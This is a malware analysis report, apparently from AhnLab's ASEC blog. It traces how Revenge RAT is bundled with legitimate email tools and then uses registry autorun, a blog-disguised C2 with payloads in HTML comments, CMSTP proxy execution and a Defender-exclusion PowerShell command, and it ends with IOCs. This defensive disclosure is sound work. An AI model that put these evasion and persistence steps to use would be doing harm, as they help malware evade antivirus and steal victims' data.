Fileless Revenge RAT Malware

AhnLab SEcurity intelligence Center (ASEC) recently discovered the distribution of Revenge RAT malware that had been developed based on legitimate tools. It appears that the attackers have used tools such as ‘smtp-validator’ and ‘Email To Sms’. At the time of execution, the malware creates and runs both a legitimate tool and a malicious file, making it difficult for users to realize that a malicious activity has occurred.

As shown in the code below, the threat actor creates and runs Setup.exe (malicious file) before executing smtp-verifier.exe (legitimate tool). The created file’s property changes to ‘Hidden’ and the file becomes hidden from typical Windows Explorer environments.

Figure 1. The code that creates and runs both legitimate and malicious files simultaneously

The figure below shows the overall flow of the malicious activities that follow afterward. Many files are generated in the process, with the threat actor’s ultimate goal being running the Revenge RAT malware.

Figure 2. The overall flow chart of the malware

The malicious file “setup.exe” created with the legitimate tool only plays the role of generating additional malware as shown below.

[ Setup.exe ]
1. Creates and runs svchost.exe in the %appdata%Microsoft\Windows\Templates path with the FileAttribute.Hidden property
2. Registers the generated svchost.exe into the registry for autorun (Value Name: Microsoft Corporation Security)

Figure 3. Registering svchost.exe into the registry

svchost.exe performs the following actions:

[ svchost.exe ]
1. Connects to C2 (hxxps://***********[.] and downloads the HTML file
2. The threat actor reads and decompresses the specific annotation and creates and runs the file explorer.exe in the %appdata%Microsoft\Windows\Templates path.

The C2 is disguised as an ordinary blog and contains the malicious file in the annotation line of a specific offset. The threat actor reads the value between <!–1111 – 2222–> written inside the HTML file, performs Base64-decoding, decompresses it, and generates additional malware.

Figure 4. The code that searches for the malicious binary in the HTML file
Figure 5. The C2 disguised as a blog with malicious binary included in the annotation

If the C2 URL mentioned in Step 1 is inaccessible, the threat actor accesses a different C2 URL (hxxp://**********.***********[.]com/2023/explorer.txt). When connected, a new C2 URL is returned which is also disguised as a normal blog. The threat actor deployed this mechanism in case the existing C2 URL is blocked or when the threat actor updates the new C2.

Figure 6. New C2 URL

The malicious file (explorer.exe) extracted from the C2’s HTML file performs the following actions:

[ explorer.exe ]
1. Creates version.exe file in the %appdata%Microsoft\Windows\ path
2. Creates an .inf file that includes the path of version.exe in the %temp% path and executes it by sending it as an argument to cmstp.exe
(CMSTP Defense Evasion)
3. Runs Revenge RAT as fileless

The generated version.exe performs a simple task shown below:

[ version.exe ]
1. Registers the files used in the attack as an exception on Windows Defender using the PowerShell command

The threat actor then sends version.exe to cmstp and runs it. This is the CMSTP Evasion, a technique of running a malicious file as a basic Windows program (cmstp.exe) to bypass antivirus detection. MITRE ATT&CK categorizes the CMSTP Evasion technique as a System Binary Proxy Execution: the CMSTP (T1218.003) technique. This technique was introduced in ASEC Blog’s previous articles [1][2] (these reports support Korean only for now) and is commonly used in various malware strains.

The .inf file that will be sent to cmstp.exe as an argument is generated with a random filename (g1rfp0hb.inf at the time of analysis) in the %temp% path. It exists in the form of a template inside the resource area within explorer.exe. The path is replaced with the version.exe’s path when the ‘REPLACE_COMMAND_LINE’ string is generated.

Figure 7. The code that generates the .inf file
Figure 8. The .inf file with the version.exe’s path

The version.exe launched using the CMSTP Evasion technique executes the following command and registers the malicious files used in the attack as an exception to Windows Defender. It can be noted that most of the malicious files such as explorer and svchost used in the attack phase are named after Windows’ default programs.

cmd.exe /c PoserShell.exe -windowstyle hidden Add-Mppreference -ExclusionPath







Afterward, the threat actor reads the binary from the resource area and uses the DES algorithm to decrypt it to finally reveal the threat actor’s end goal, the Revenge RAT. MITRE ATT&CK categorizes RAT as Revenge RAT (S0379), and includes malicious activities such as the collection of system information, screen capture, keylogging, additional malware download, and script execution.

Revenge RAT is run fileless inside the memory. It collects data from the victim’s PC and sends it to C2 (qcpanel.hackcrack[.]io:9561) in a Base64-encoded format. The types of user data stolen are shown below:

[ Stolen Data ]
1. PC and user name
2. System information such as the OS, CPU, and drive capacity
3. Information of the parent process used to execute itself (Revenge RAT)
4. IP address and region information
5. Names of anti-virus and firewall products in use

Figure 9. Revenge RAT malware’s C2
Figure 10. Collecting and sending data from the user’s PC

Users must take extra caution when using open source or public tools like the ones mentioned in this article, and always download them from the official website.

[File Detection]
– Trojan/Win.Generic.C4223332
– Trojan/Win.Generic.C5583117
– Dropper/Win.Generic.C5445718
– Dropper/Win.Generic.R634030
– Backdoor/Win.REVENGERAT.C5582863
– Backdoor/Win.REVENGERAT.R634026

[IOC Info]
42779ab18cf6367e7b91e621646237d1 (smtp-verifier.exe)
fb34fe9591ea3074f048feb5b515eb61 (Email To Sms V8.1.exe)
6d5ad2adce366350200958c37f08a994 (setup.exe)
914ec5019485543bb2ec8edcacd662a7 (setup.exe)
5e24e97bbc8354e13ee3ab70da2f3af6 (svchost.exe)
1242c41211464efab297bfa6c374223e (svchost.exe)
438817d3938ae5758d94bf2022a44505 (explorer.exe)
304e264473717fad8f7c6970212eaaa7 (version.exe)
d1af87e121d55230353cbad9b7024fae (Fileless RevengeRAT)
6e22b450a765caa999ca984521b42242 (g1rfp0hb.inf)

– qcpanel.hackcrack[.]io:9561

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

The post Fileless Revenge RAT Malware appeared first on ASEC BLOG.

Article Link: